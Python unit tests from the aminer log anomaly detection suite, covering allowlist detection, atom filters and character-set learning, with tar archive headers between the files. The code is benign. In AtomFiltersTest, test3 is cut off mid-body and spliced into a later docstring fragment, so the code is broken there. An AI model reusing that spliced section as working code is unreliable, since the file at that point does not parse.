        # path match/s2 is allowlisted by the second rule: accepted, no output
        fixed_dme = FixedDataModelElement("s2", fixed_string)
        match_context = MatchContext(fixed_string)
        match_element = fixed_dme.get_match_element("match", match_context)
        log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, allowlist_violation_detector)
        self.assertTrue(allowlist_violation_detector.receive_atom(log_atom))
        self.assertEqual(self.output_stream.getvalue(), "")

        # path match/s3 is covered by no rule: receive_atom returns False and the violation is reported with the raw line
        fixed_dme = FixedDataModelElement("s3", fixed_string)
        match_context = MatchContext(fixed_string)
        match_element = fixed_dme.get_match_element("match", match_context)
        log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, path_exists_match_rule)
        self.assertTrue(not allowlist_violation_detector.receive_atom(log_atom))
        self.assertEqual(self.output_stream.getvalue(), '%s No allowlisting for current atom\n%s: "None" (%d lines)\n %s\n\n' % (
            datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), allowlist_violation_detector.__class__.__name__, 1, "fixed String"))

    def test2validate_parameters(self):
        """
        Test all initialization parameters for the detector.

        Input parameters must be validated in the class: an empty rule list is a ValueError, wrong types for the rule list, the
        event handler list, output_logline and log_resource_ignore_list are TypeErrors, and a bare path in
        log_resource_ignore_list is rejected with ValueError while the file:// form is accepted.
        """
        pem_rule = PathExistsMatchRule("match/s1", None)
        pem_rule2 = PathExistsMatchRule("match/s2", None)
        allowlist_rules = [pem_rule, pem_rule2]
        self.assertRaises(ValueError, AllowlistViolationDetector, self.aminer_config, [], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, None, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, "", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, True, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, 123, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, (), [self.stream_printer_event_handler])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, set(), [self.stream_printer_event_handler])

        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, ["default"])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, None)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, "")
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, b"Default")
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, True)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, 123)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, 123.3)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, {"id": "Default"})
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, ())
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, set())

        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=None)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=b"True")
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline="True")
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=123)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=123.22)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline={"id": "Default"})
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=["Default"])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=[])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=())
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          output_logline=set())
        AllowlistViolationDetector(self.aminer_config, allowlist_rules, [self.stream_printer_event_handler], output_logline=True)
        # an empty event handler list is accepted, unlike an empty rule list
        AllowlistViolationDetector(self.aminer_config, allowlist_rules, [], output_logline=True)

        self.assertRaises(ValueError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=["/tmp/syslog"])
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list="")
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=b"Default")
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=True)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=123)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=123.22)
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list={"id": "Default"})
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=())
        self.assertRaises(TypeError, AllowlistViolationDetector, self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
                          log_resource_ignore_list=set())
        AllowlistViolationDetector(self.aminer_config, allowlist_rules, [self.stream_printer_event_handler],
log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/AtomFiltersTest.py000066400000000000000000000317411500476301700272540ustar00rootroot00000000000000
import unittest
from aminer.analysis.AtomFilters import SubhandlerFilter, MatchPathFilter, MatchValueFilter
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
import time
from datetime import datetime
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement


class AtomFiltersTest(TestBase):
    """Unittests for the AtomFilters."""

    def test1receive_atom_SubhandlerFilter(self):
        """
        Test if log atoms are processed correctly with the SubhandlerFilter and the stop_when_handled flag is working properly.

        Two NewMatchPathDetectors share one output stream; the number of "New path(s) detected" reports shows how many subhandlers
        saw the atom.
        """
        expected_string = '%s New path(s) detected\n%s: "None" (%d lines)\n %s: %s\n%s\n%s\n\n'
        match_path = "fixed/s1"
        datetime_format_string = "%Y-%m-%d %H:%M:%S"
        data = b"25000"
        match_context = DummyMatchContext(data)
        fdme = DummyFixedDataModelElement("s1", data)
        match_element = fdme.get_match_element("fixed", match_context)
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        other_nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        t = time.time()
        log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd)

        # more than one subhandler can handle the log_atom (stop_when_handled flag is false): the report appears twice.
        subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], False)
        self.assertTrue(subhandler_filter.receive_atom(log_atom))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd.__class__.__name__, 1, match_path, data.decode(),
            f"['{match_path}']", data.decode()) + expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd.__class__.__name__, 1, match_path, data.decode(),
            f"['{match_path}']", data.decode()))
        self.reset_output_stream()

        # SubhandlerFilter stops processing after first subhandler handles the log_atom (stop_when_handled flag is true): one report.
        subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], True)
        self.assertTrue(subhandler_filter.receive_atom(log_atom))
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd.__class__.__name__, 1, match_path, data.decode(),
            f"['{match_path}']", data.decode()))
        self.reset_output_stream()

        # atom not handled: with no subhandlers receive_atom reports False.
        subhandler_filter = SubhandlerFilter([], True)
        log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd)
        self.assertFalse(subhandler_filter.receive_atom(log_atom))

    def test2add_handler_SubhandlerFilter(self):
        """Test if new detectors can be added to the SubhandlerFilter; subhandler_list keeps (handler, stop_when_handled) tuples in order."""
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler],"Default", False)
        other_nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler],"Default", False)
        subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], False)
        self.assertEqual(subhandler_filter.subhandler_list, [(nmpd, False), (other_nmpd, False)])
        # the same handler may be added again with a different flag; duplicates are not filtered
        subhandler_filter.add_handler(nmpd, True)
        subhandler_filter.add_handler(other_nmpd, False)
        self.assertEqual(subhandler_filter.subhandler_list, [(nmpd, False), (other_nmpd, False), (nmpd, True), (other_nmpd, False)])
        subhandler_filter = SubhandlerFilter([nmpd, other_nmpd], True)
        self.assertEqual(subhandler_filter.subhandler_list, [(nmpd, True), (other_nmpd, True)])

    def test3receive_atom_MatchPathFilter(self):
        """Test if log atoms are processed correctly with the MatchPathFilter and the stop_when_handled flag is working properly."""
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        data = b"data"
        match_context = DummyMatchContext(data)
        fdme = DummyFixedDataModelElement("s1", data)
        match_element = fdme.get_match_element("fixed", match_context)
        t = time.time()
        log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd)

        # There is a path in the dictionary and the handler are not None. The default_parsed_atom_handler is None.
        match_path_filter = MatchPathFilter([(match_element.get_path(), nmpd)], None)
        self.assertTrue(match_path_filter.receive_atom(log_atom))

        # The searched path is not in the dictionary. The default_parsed_atom_handler is None.
Input parameters must be validated in the class.

        Elements of the handler list must be atom handlers (plain tuples, strings, None, ... are rejected) and stop_when_handled
        must be a bool.
        """
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler],"Default", False)
        self.assertRaises(TypeError, SubhandlerFilter, [""], True)
        self.assertRaises(TypeError, SubhandlerFilter, [b""], True)
        self.assertRaises(TypeError, SubhandlerFilter, [True], True)
        self.assertRaises(TypeError, SubhandlerFilter, [None], True)
        self.assertRaises(TypeError, SubhandlerFilter, [123], True)
        self.assertRaises(TypeError, SubhandlerFilter, [123.2], True)
        self.assertRaises(TypeError, SubhandlerFilter, [{"id": "Default"}], True)
        self.assertRaises(TypeError, SubhandlerFilter, [["Default"]], True)
        self.assertRaises(TypeError, SubhandlerFilter, [set()], True)
        self.assertRaises(TypeError, SubhandlerFilter, [()], True)
        # the internal (handler, flag) tuple form is not accepted as input
        self.assertRaises(TypeError, SubhandlerFilter, [(nmpd, False)], True)
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], "")
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], None)
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], b"Default")
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], 123)
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], 123.2)
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], {"id": "Default"})
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], ["Default"])
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], [])
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], ())
        self.assertRaises(TypeError, SubhandlerFilter, [nmpd], set())
        SubhandlerFilter([nmpd], False)

    def test6validate_parameters_MatchPathFilter(self):
        """
        Test all initialization parameters for the detector.

        Input parameters must be validated in the class: the list must hold (path, handler) tuples with a non-None handler, and
        the default handler must be None or an atom handler.
        """
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        self.assertRaises(TypeError, MatchPathFilter, [""])
        self.assertRaises(TypeError, MatchPathFilter, [b""])
        self.assertRaises(TypeError, MatchPathFilter, [True])
        self.assertRaises(TypeError, MatchPathFilter, [None])
        self.assertRaises(TypeError, MatchPathFilter, [123])
        self.assertRaises(TypeError, MatchPathFilter, [123.2])
        self.assertRaises(TypeError, MatchPathFilter, [{"id": "Default"}])
        self.assertRaises(TypeError, MatchPathFilter, [["Default"]])
        self.assertRaises(TypeError, MatchPathFilter, [set()])
        self.assertRaises(TypeError, MatchPathFilter, [()])
        self.assertRaises(TypeError, MatchPathFilter, [("path", None)])
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], "")
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], True)
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], b"Default")
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], 123)
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], 123.2)
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], {"id": "Default"})
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], ["Default"])
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], [])
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], ())
        self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], set())
        MatchPathFilter([("path", nmpd)], None)
        MatchPathFilter([("path", nmpd)], nmpd)

    def test7validate_parameters_MatchValueFilter(self):
        """
        Test all initialization parameters for the detector.

        Input parameters must be validated in the class: the target path must be a non-empty str (empty is ValueError), the value
        dictionary must map values to non-None handlers, and the default handler must be None or a single atom handler.
        """
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        dictionary = {b"val": nmpd}
        path = "path"
        self.assertRaises(ValueError, MatchValueFilter, "", dictionary)
        self.assertRaises(TypeError, MatchValueFilter, b"", dictionary)
        self.assertRaises(TypeError, MatchValueFilter, True, dictionary)
        self.assertRaises(TypeError, MatchValueFilter, None, dictionary)
        self.assertRaises(TypeError, MatchValueFilter, 123, dictionary)
        self.assertRaises(TypeError, MatchValueFilter, 123.2, dictionary)
        self.assertRaises(TypeError, MatchValueFilter, {"id": "Default"}, dictionary)
        self.assertRaises(TypeError, MatchValueFilter, ["Default"], dictionary)
        self.assertRaises(TypeError, MatchValueFilter, set(), dictionary)
        self.assertRaises(TypeError, MatchValueFilter, (), dictionary)
        self.assertRaises(TypeError, MatchValueFilter, ("path", None), dictionary)
        self.assertRaises(TypeError, MatchValueFilter, path, "")
        self.assertRaises(TypeError, MatchValueFilter, path, True)
        self.assertRaises(TypeError, MatchValueFilter, path, b"Default")
        self.assertRaises(TypeError, MatchValueFilter, path, 123)
        self.assertRaises(TypeError, MatchValueFilter, path, 123.2)
        self.assertRaises(TypeError, MatchValueFilter, path, {"id": "Default"})
        self.assertRaises(TypeError, MatchValueFilter, path, ["Default"])
        self.assertRaises(TypeError, MatchValueFilter, path, [])
        self.assertRaises(TypeError, MatchValueFilter, path, ())
        self.assertRaises(TypeError, MatchValueFilter, path, set())
        self.assertRaises(TypeError, MatchValueFilter, path, {"id": None})
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, "")
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, b"")
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, True)
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, 123)
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, 123.22)
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, {"id": "Default"})
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, ["Default"])
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, [nmpd])
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, set())
        self.assertRaises(TypeError, MatchValueFilter, path, dictionary, ())
        MatchValueFilter("path", dictionary, None)
        MatchValueFilter("path", dictionary, nmpd)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/CharsetDetectorTest.py000066400000000000000000000756411500476301700301140ustar00rootroot00000000000000
import unittest
import time
from datetime import datetime
from aminer.analysis.CharsetDetector import CharsetDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD


class CharsetDetectorTest(TestBase):
    """Unittests for the CharsetDetector."""

    def test1receive_atom(self):
        """
        This test case checks the normal detection of new character sets.

        The charset detector is used to learn an alphabet and detect new characters for different identifiers.
        Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False.
        Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly.
        """
        t = time.time()
        expected_string = '%s New character(s) detected\n%s: "None" (%d lines)\n %s\n\n'
        dtf = "%Y-%m-%d %H:%M:%S"
        # Prepare log atoms that represent two entities (id) with strings (value). Anomalies are generated when new characters are observed.
# The following events are generated:
        # id: a value: abc
        # id: b value: xyz
        # id: a value: asdf
        # id: a value: xxx
        # id: a value: bass
        # id: a value: max
        # NOTE(review): the raw lines of log_atom4 and log_atom6 start with "b" although their id element is "a"; the detector
        # works on the match elements, the raw line only shows up in the expected output - confirm this is intentional.
        m1 = MatchElement("/model/id", b"a", b"a", None)
        m2 = MatchElement("/model/value", b"abc", b"abc", None)
        log_atom1 = LogAtom(b"aabc", ParserMatch(MatchElement("/model", b"aabc", b"aabc", [m1, m2])), t+1, None)
        m3 = MatchElement("/model/id", b"b", b"b", None)
        m4 = MatchElement("/model/value", b"xyz", b"xyz", None)
        log_atom2 = LogAtom(b"bxyz", ParserMatch(MatchElement("/model", b"bxyz", b"bxyz", [m3, m4])), t+2, None)
        m5 = MatchElement("/model/id", b"a", b"a", None)
        m6 = MatchElement("/model/value", b"asdf", b"asdf", None)
        log_atom3 = LogAtom(b"aasdf", ParserMatch(MatchElement("/model", b"aasdf", b"aasdf", [m5, m6])), t+3, None)
        m7 = MatchElement("/model/id", b"a", b"a", None)
        m8 = MatchElement("/model/value", b"xxx", b"xxx", None)
        log_atom4 = LogAtom(b"bxxx", ParserMatch(MatchElement("/model", b"bxxx", b"bxxx", [m7, m8])), t+4, None)
        m9 = MatchElement("/model/id", b"a", b"a", None)
        m10 = MatchElement("/model/value", b"bass", b"bass", None)
        log_atom5 = LogAtom(b"abass", ParserMatch(MatchElement("/model", b"abass", b"abass", [m9, m10])), t+5, None)
        m11 = MatchElement("/model/id", b"a", b"a", None)
        m12 = MatchElement("/model/value", b"max", b"max", None)
        log_atom6 = LogAtom(b"bmax", ParserMatch(MatchElement("/model", b"bmax", b"bmax", [m11, m12])), t+6, None)

        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True,
                             output_logline=False)

        # Forward log atoms to detector. cd.charsets maps the id tuple to the set of character ordinals seen so far.

        # First value of id (a) should not generate an anomaly
        # Input: id: a value: abc
        # Expected output: None
        cd.receive_atom(log_atom1)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abc"])})

        # First value of id (b) should not generate an anomaly
        # Input: id: b value: xyz
        # Expected output: None
        cd.receive_atom(log_atom2)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abc"]), ("b",): set([ord(x) for x in "xyz"])})

        # Second value of id (a) should generate an anomaly for new characters ("sdf" of "asdf" not in "abc")
        # Input: id: a value: asdf
        # Expected output: Anomaly
        cd.receive_atom(log_atom3)
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(dtf), cd.__class__.__name__, 1, "aasdf"))
        self.reset_output_stream()
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfs"]), ("b",): set([ord(x) for x in "xyz"])})

        # Third value of id (a) should generate an anomaly for new characters ("x" not in "abcsdf", only in "xyz" from other id (b))
        # Input: id: a value: xxx
        # Expected output: Anomaly
        cd.receive_atom(log_atom4)
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), cd.__class__.__name__, 1, "bxxx"))
        self.reset_output_stream()
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfsx"]), ("b",): set([ord(x) for x in "xyz"])})

        # Fourth value of id (a) should not generate an anomaly (all characters of "bass" in "abcsdfx")
        # Input: id: a value: bass
        # Expected output: None
        cd.receive_atom(log_atom5)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfsx"]), ("b",): set([ord(x) for x in "xyz"])})

        # Fifth value of id (a) should generate an anomaly for new characters ("m" of "max" not in "abcsdfx")
        cd.receive_atom(log_atom6)
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), cd.__class__.__name__, 1, "bmax"))
        self.reset_output_stream()
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfmsx"]), ("b",): set([ord(x) for x in "xyz"])})

        # stop_learning_time: learning is switched off once an atom arrives more than 100 s after the first one (t + 102), but not at t + 99.
        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True,
                             output_logline=False, stop_learning_time=100)
        self.assertTrue(cd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(cd.receive_atom(log_atom1))
        self.assertTrue(cd.learn_mode)
        log_atom1.atom_time = t + 102
        self.assertTrue(cd.receive_atom(log_atom1))
        self.assertFalse(cd.learn_mode)

        # stop_learning_no_anomaly_time: every new character (log_atom2, log_atom3) is an anomaly and keeps learning alive; learning stops
        # only after 100 s without an anomaly.
        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True,
                             output_logline=False, stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(cd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(cd.receive_atom(log_atom1))
        self.assertTrue(cd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(cd.receive_atom(log_atom2))
        self.assertTrue(cd.learn_mode)
        # NOTE(review): atom_time is set on log_atom1 here but log_atom3 (atom_time t + 3) is the atom fed in; probably
        # log_atom3.atom_time was meant - confirm and fix in a separate change.
        log_atom1.atom_time = t + 200
        self.assertTrue(cd.receive_atom(log_atom3))
        self.assertTrue(cd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(cd.receive_atom(log_atom1))
        self.assertFalse(cd.learn_mode)

    def test2do_timer(self):
        """
        Test if the do_timer method is implemented properly.

        do_timer returns the seconds remaining until next_persist_time; once that time is reached it returns DEFAULT_PERSISTENCE_PERIOD
        (the t + 999 -> 1 and t + 1000 -> period steps imply next_persist_time advances by the period; presumably 600 - not asserted here).
        """
        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"])
        t = time.time()
        cd.next_persist_time = t + 400
        self.assertEqual(cd.do_timer(t + 200), 200)
        self.assertEqual(cd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(cd.do_timer(t + 999), 1)
        self.assertEqual(cd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """Test if the allowlist_event method is implemented properly: allowlisted paths are appended to constraint_list, even with learn_mode off."""
        # This test case checks whether an exception is thrown when entering an event of another class.
        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"])
        analysis = "Analysis.%s"
        self.assertRaises(Exception, cd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)

        # The CharsetDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, cd.allowlist_event, analysis % cd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])

        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(cd.allowlist_event(analysis % cd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % (
            "/s1", analysis % cd.__class__.__name__))
        self.assertEqual(cd.constraint_list, ["/s1"])
        cd.learn_mode = False
        self.assertEqual(cd.allowlist_event(analysis % cd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % (
            "/d1", analysis % cd.__class__.__name__))
        self.assertEqual(cd.constraint_list, ["/s1", "/d1"])

    def test4blocklist_event(self):
        """Test if the blocklist_event method is implemented properly: blocklisted paths are appended to ignore_list, even with learn_mode off."""
        # This test case checks whether an exception is thrown when entering an event of another class.
        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"])
        analysis = "Analysis.%s"
        self.assertRaises(Exception, cd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)

        # The CharsetDetector can not handle blocklisting data and therefore an exception is expected.
        self.assertRaises(Exception, cd.blocklist_event, analysis % cd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])

        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(cd.blocklist_event(analysis % cd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s."
% ("/s1", analysis % cd.__class__.__name__))
        self.assertEqual(cd.ignore_list, ["/s1"])
        cd.learn_mode = False
        self.assertEqual(cd.blocklist_event(analysis % cd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % (
            "/d1", analysis % cd.__class__.__name__))
        self.assertEqual(cd.ignore_list, ["/s1", "/d1"])

    def test5persistence(self):
        """
        Test the do_persist and load_persistence_data methods.

        After six atoms the learned charsets are written to cd.persistence_file_name, read back into an emptied detector, and also
        picked up by a freshly constructed detector using the same configuration.
        """
        t = time.time()
        cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True,
                             output_logline=False)
        m1 = MatchElement("/model/id", b"a", b"a", None)
        m2 = MatchElement("/model/value", b"abc", b"abc", None)
        log_atom1 = LogAtom(b"aabc", ParserMatch(MatchElement("/model", b"aabc", b"aabc", [m1, m2])), t + 1, None)
        m3 = MatchElement("/model/id", b"b", b"b", None)
        m4 = MatchElement("/model/value", b"xyz", b"xyz", None)
        log_atom2 = LogAtom(b"bxyz", ParserMatch(MatchElement("/model", b"bxyz", b"bxyz", [m3, m4])), t + 2, None)
        m5 = MatchElement("/model/id", b"a", b"a", None)
        m6 = MatchElement("/model/value", b"asdf", b"asdf", None)
        log_atom3 = LogAtom(b"aasdf", ParserMatch(MatchElement("/model", b"aasdf", b"aasdf", [m5, m6])), t + 3, None)
        m7 = MatchElement("/model/id", b"a", b"a", None)
        m8 = MatchElement("/model/value", b"xxx", b"xxx", None)
        log_atom4 = LogAtom(b"bxxx", ParserMatch(MatchElement("/model", b"bxxx", b"bxxx", [m7, m8])), t + 4, None)
        m9 = MatchElement("/model/id", b"a", b"a", None)
        m10 = MatchElement("/model/value", b"bass", b"bass", None)
        log_atom5 = LogAtom(b"abass", ParserMatch(MatchElement("/model", b"abass", b"abass", [m9, m10])), t + 5, None)
        m11 = MatchElement("/model/id", b"a", b"a", None)
        m12 = MatchElement("/model/value", b"max", b"max", None)
        log_atom6 = LogAtom(b"bmax", ParserMatch(MatchElement("/model", b"bmax", b"bmax", [m11, m12])), t + 6, None)
        cd.receive_atom(log_atom1)
        cd.receive_atom(log_atom2)
        cd.receive_atom(log_atom3)
        cd.receive_atom(log_atom4)
        cd.receive_atom(log_atom5)
        cd.receive_atom(log_atom6)
        cd.do_persist()
        # The persisted form is a JSON-style nested list with "string:"-prefixed ids; the ordinals appear in first-seen order
        # (a, b, c, s, d, f, x, m), not sorted, so this literal must follow any change to the persistence format.
        with open(cd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[[["string:a"], [97, 98, 99, 115, 100, 102, 120, 109]], [["string:b"], [120, 121, 122]]]')
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfmsx"]), ("b",): set([ord(x) for x in "xyz"])})

        # reloading restores exactly the in-memory state that was persisted
        cd.charsets = {}
        cd.load_persistence_data()
        self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfmsx"]), ("b",): set([ord(x) for x in "xyz"])})

        # a new detector instance loads the same persisted data on construction
        other = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True,
                                output_logline=False)
        self.assertEqual(other.charsets, cd.charsets)

    def test6validate_parameters(self):
        """
        Test all initialization parameters for the detector.

        Input parameters must be validated in the class: the event handler list must be a list of handlers (wrong element or container
